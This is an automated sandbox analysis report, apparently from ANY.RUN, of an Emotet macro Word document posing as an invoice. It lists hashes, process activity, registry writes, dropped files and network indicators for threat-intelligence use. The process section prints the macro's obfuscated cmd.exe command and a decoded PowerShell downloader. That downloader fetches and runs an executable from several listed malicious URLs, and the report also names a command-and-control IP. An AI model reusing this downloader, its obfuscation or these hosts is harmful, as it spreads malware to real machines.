analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Invoice as at 06_12_2018.doc

Full analysis: https://app.any.run/tasks/6d5b6be3-9556-40ee-8468-98ebd029e609
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: December 06, 2018, 07:41:46
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
trojan
loader
emotet
feodo
emotet-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Dec 6 07:32:00 2018, Last Saved Time/Date: Thu Dec 6 07:32:00 2018, Number of Pages: 1, Number of Words: 7, Number of Characters: 42, Security: 0
MD5:

584A17F6F962909C35DE36433CAF0433

SHA1:

0B8F6B13B671177C4AC14EE1316715FF8EB5E894

SHA256:

13541316928F9E5F6462E5405C87A3A03F247221D320FFB7A45F832DE0FB1FDC

SSDEEP:

3072:S8GhDS0o9zTGOZD6EbzCdQq3/I7ChQ1aL1C:8oUOZDlbeQqPIehQ1aL1C

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2988)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2988)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2240)
    • Application was dropped or rewritten from another process

      • 697.exe (PID: 1240)
      • 697.exe (PID: 3476)
      • archivesymbol.exe (PID: 2792)
      • archivesymbol.exe (PID: 3768)
    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 3788)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3788)
    • EMOTET was detected

      • archivesymbol.exe (PID: 2792)
    • Connects to CnC server

      • archivesymbol.exe (PID: 2792)
    • Changes the autorun value in the registry

      • archivesymbol.exe (PID: 2792)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 3976)
      • cmd.exe (PID: 2572)
      • cmd.exe (PID: 2240)
      • cmd.exe (PID: 2640)
    • Application launched itself

      • cmd.exe (PID: 2640)
      • cmd.exe (PID: 2572)
      • 697.exe (PID: 3476)
    • Creates files in the user directory

      • powershell.exe (PID: 3788)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3788)
      • 697.exe (PID: 1240)
    • Starts itself from another location

      • 697.exe (PID: 1240)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2988)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2988)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 48
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 42
Words: 7
Pages: 1
ModifyDate: 2018:12:06 07:32:00
CreateDate: 2018:12:06 07:32:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: -
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
44
Monitored processes
13
Malicious processes
9
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs find.exe no specs powershell.exe 697.exe no specs 697.exe archivesymbol.exe no specs #EMOTET archivesymbol.exe

Process information

PID
CMD
Path
Indicators
Parent process
2988"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Invoice as at 06_12_2018.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
3976c:\djlHiiJvoFIViL\RzjPdOpBsDBQMi\YRLnzqw\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:/C"set NP=wrjtPpKmHtfYCRSfWFGJRYfCti7-z$}sA)c@(,BI{vT/2;x yl\khn0VX9Du6a'8dbe:N1=Lqo.+g&&for %v in (29,7,18,14,70,62,71,68,18,62,45,29,22,51,34,70,53,66,0,27,73,65,2,66,34,24,47,68,66,24,74,16,66,65,23,49,25,66,53,24,45,29,56,19,71,70,62,52,24,24,5,67,43,43,7,61,1,72,59,25,31,66,64,25,61,7,73,53,64,66,53,76,61,76,66,7,66,53,24,1,25,53,76,74,34,73,7,43,20,22,76,35,52,24,24,5,67,43,43,73,7,25,64,69,31,52,73,5,74,34,73,7,43,44,25,48,2,28,73,35,52,24,24,5,67,43,43,53,52,61,51,52,73,61,59,34,34,52,61,59,74,34,73,7,74,41,53,43,1,25,23,39,21,49,4,63,35,52,24,24,5,67,43,43,53,48,34,22,5,22,74,34,73,7,43,44,49,54,35,52,24,24,5,67,43,43,7,25,74,65,7,76,59,27,64,66,41,74,34,73,7,43,60,61,25,62,74,14,5,49,25,24,36,62,35,62,33,45,29,2,34,25,70,62,56,0,73,62,45,29,4,56,71,47,70,47,62,60,57,26,62,45,29,24,28,61,70,62,52,68,21,62,45,29,28,56,32,70,29,66,53,41,67,24,66,7,5,75,62,50,62,75,29,4,56,71,75,62,74,66,46,66,62,45,22,73,1,66,61,34,52,36,29,18,68,65,47,25,53,47,29,56,19,71,33,40,24,1,48,40,29,22,51,34,74,58,73,0,53,49,73,61,64,17,25,49,66,36,29,18,68,65,37,47,29,28,56,32,33,45,29,25,71,55,70,62,16,38,0,62,45,39,22,47,36,36,18,66,24,27,39,24,66,7,47,29,28,56,32,33,74,49,66,53,76,24,52,47,27,76,66,47,63,54,54,54,54,33,47,40,39,53,41,73,51,66,27,39,24,66,7,47,29,28,56,32,45,29,42,56,21,70,62,25,7,6,62,45,65,1,66,61,51,45,30,30,34,61,24,34,52,40,30,30,29,17,5,25,70,62,19,5,32,62,45,80)do set P9M=!P9M!!NP:~%v,1!&&if %v geq 80 echo !P9M:~5!|FOR /F "delims=D.j tokens=2" %w IN ('ftype^^^|find "llDa"')DO %w -" c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2572CmD /V:/C"set NP=wrjtPpKmHtfYCRSfWFGJRYfCti7-z$}sA)c@(,BI{vT/2;x yl\khn0VX9Du6a'8dbe:N1=Lqo.+g&&for %v in (29,7,18,14,70,62,71,68,18,62,45,29,22,51,34,70,53,66,0,27,73,65,2,66,34,24,47,68,66,24,74,16,66,65,23,49,25,66,53,24,45,29,56,19,71,70,62,52,24,24,5,67,43,43,7,61,1,72,59,25,31,66,64,25,61,7,73,53,64,66,53,76,61,76,66,7,66,53,24,1,25,53,76,74,34,73,7,43,20,22,76,35,52,24,24,5,67,43,43,73,7,25,64,69,31,52,73,5,74,34,73,7,43,44,25,48,2,28,73,35,52,24,24,5,67,43,43,53,52,61,51,52,73,61,59,34,34,52,61,59,74,34,73,7,74,41,53,43,1,25,23,39,21,49,4,63,35,52,24,24,5,67,43,43,53,48,34,22,5,22,74,34,73,7,43,44,49,54,35,52,24,24,5,67,43,43,7,25,74,65,7,76,59,27,64,66,41,74,34,73,7,43,60,61,25,62,74,14,5,49,25,24,36,62,35,62,33,45,29,2,34,25,70,62,56,0,73,62,45,29,4,56,71,47,70,47,62,60,57,26,62,45,29,24,28,61,70,62,52,68,21,62,45,29,28,56,32,70,29,66,53,41,67,24,66,7,5,75,62,50,62,75,29,4,56,71,75,62,74,66,46,66,62,45,22,73,1,66,61,34,52,36,29,18,68,65,47,25,53,47,29,56,19,71,33,40,24,1,48,40,29,22,51,34,74,58,73,0,53,49,73,61,64,17,25,49,66,36,29,18,68,65,37,47,29,28,56,32,33,45,29,25,71,55,70,62,16,38,0,62,45,39,22,47,36,36,18,66,24,27,39,24,66,7,47,29,28,56,32,33,74,49,66,53,76,24,52,47,27,76,66,47,63,54,54,54,54,33,47,40,39,53,41,73,51,66,27,39,24,66,7,47,29,28,56,32,45,29,42,56,21,70,62,25,7,6,62,45,65,1,66,61,51,45,30,30,34,61,24,34,52,40,30,30,29,17,5,25,70,62,19,5,32,62,45,80)do set P9M=!P9M!!NP:~%v,1!&&if %v geq 80 echo !P9M:~5!|FOR /F "delims=D.j tokens=2" %w IN ('ftype^^^|find "llDa"')DO %w -"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1916C:\Windows\system32\cmd.exe /S /D /c" echo $mGS='LNG';$fkc=new-object Net.WebClient;$XJL='http://marquisediamondengagementring.com/Rfg@http://omid1shop.com/2iyjzo@http://nhakhoaucchau.com.vn/riCIYlP8@http://nycfpf.com/2l0@http://mi.bmgu-dev.com/6ai'.Split('@');$jci='Xwo';$PXL = '697';$tza='hNY';$zXA=$env:temp+'\'+$PXL+'.exe';foreach($GNb in $XJL){try{$fkc.DownloadFile($GNb, $zXA);$iLV='WBw';If ((Get-Item $zXA).length -ge 80000) {Invoke-Item $zXA;$TXY='imK';break;}}catch{}}$Fpi='JpA';"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2240C:\Windows\system32\cmd.exe /S /D /c" FOR /F "delims=D.j tokens=2" %w IN ('ftype^|find "llDa"') DO %w -"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2640C:\Windows\system32\cmd.exe /c ftype|find "llDa"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2104C:\Windows\system32\cmd.exe /S /D /c" ftype"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\gdi32.dll
3024find "llDa"C:\Windows\system32\find.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Find String (grep) Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\find.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ulib.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
3788PowerShell -C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
3476"C:\Users\admin\AppData\Local\Temp\697.exe" C:\Users\admin\AppData\Local\Temp\697.exepowershell.exe
User:
admin
Company:
Nexon Corp.
Integrity Level:
MEDIUM
Description:
Softpub Forwarder DLL
Exit code:
0
Version:
6.1.7600.1
Modules
Images
c:\users\admin\appdata\local\temp\697.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\crypt32.dll
Total events
1 509
Read events
1 372
Write events
128
Delete events
9

Modification events

(PID) Process:(2988) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:2:0
Value:
323A3000AC0B0000010000000000000000000000
(PID) Process:(2988) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(2988) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
On
(PID) Process:(2988) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:WORDFiles
Value:
1300627477
(PID) Process:(2988) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1300627596
(PID) Process:(2988) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1300627597
(PID) Process:(2988) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
Operation:writeName:MTTT
Value:
AC0B0000C0433E2D378DD40100000000
(PID) Process:(2988) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:,;0
Value:
2C3B3000AC0B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(2988) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:delete valueName:,;0
Value:
2C3B3000AC0B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(2988) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
Executable files
2
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
2988WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR6A92.tmp.cvr
MD5:
SHA256:
3788powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SCZF9WVSKM5ANAZCPTB5.temp
MD5:
SHA256:
2988WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFF87010F48E60D5B0.TMP
MD5:
SHA256:
2988WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8044F728-7271-4F6C-9029-E8E80D900DE5}.tmp
MD5:
SHA256:
2988WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{E3D2DAB4-2B46-4DD5-9EE4-81F7A4B6ABE3}.tmp
MD5:
SHA256:
2988WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$voice as at 06_12_2018.docpgc
MD5:FB9D2C49FA8EE896AD425FE3DE4D5A60
SHA256:8DDCAB123632E7E1D2F2F04181B527C686DAAE8403539400A1F9DE5C964925C8
1240697.exeC:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exeexecutable
MD5:E3F916940EE6DF816F0670E8CB056A35
SHA256:CA44210BE90068354F8FD74FDD9A9A43A38747A225E764E7F480A46E15661FA3
3788powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF247986.TMPbinary
MD5:6073B6FC66D2E68644893344F6904E4A
SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3
3788powershell.exeC:\Users\admin\AppData\Local\Temp\697.exeexecutable
MD5:E3F916940EE6DF816F0670E8CB056A35
SHA256:CA44210BE90068354F8FD74FDD9A9A43A38747A225E764E7F480A46E15661FA3
2988WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:3D4A380090CD9557B8F5CB9F01890737
SHA256:1238205C590693CDF83C4D96616F15D937EFFE9B1BAD4340E00F0D0EE6F6A186
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3788
powershell.exe
GET
200
149.47.76.202:80
http://marquisediamondengagementring.com/Rfg/
US
executable
120 Kb
malicious
3788
powershell.exe
GET
301
149.47.76.202:80
http://marquisediamondengagementring.com/Rfg
US
html
253 b
malicious
2792
archivesymbol.exe
GET
200
114.55.106.210:443
http://114.55.106.210:443/
CN
binary
132 b
malicious
2792
archivesymbol.exe
GET
200
114.55.106.210:443
http://114.55.106.210:443/
CN
binary
132 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2792
archivesymbol.exe
114.55.106.210:443
Hangzhou Alibaba Advertising Co.,Ltd.
CN
malicious
3788
powershell.exe
149.47.76.202:80
marquisediamondengagementring.com
NEXCESS.NET L.L.C.
US
malicious

DNS requests

Domain
IP
Reputation
marquisediamondengagementring.com
  • 149.47.76.202
malicious

Threats

PID
Process
Class
Message
3788
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
3788
powershell.exe
A Network Trojan was detected
ET POLICY Terse Named Filename EXE Download - Possibly Hostile
3788
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3788
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3788
powershell.exe
Misc activity
ET INFO EXE CheckRemoteDebuggerPresent (Used in Malware Anti-Debugging)
3788
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
2792
archivesymbol.exe
A Network Trojan was detected
SC SPYWARE Spyware Emotet Win32
2792
archivesymbol.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
1 ETPRO signatures available at the full report
No debug info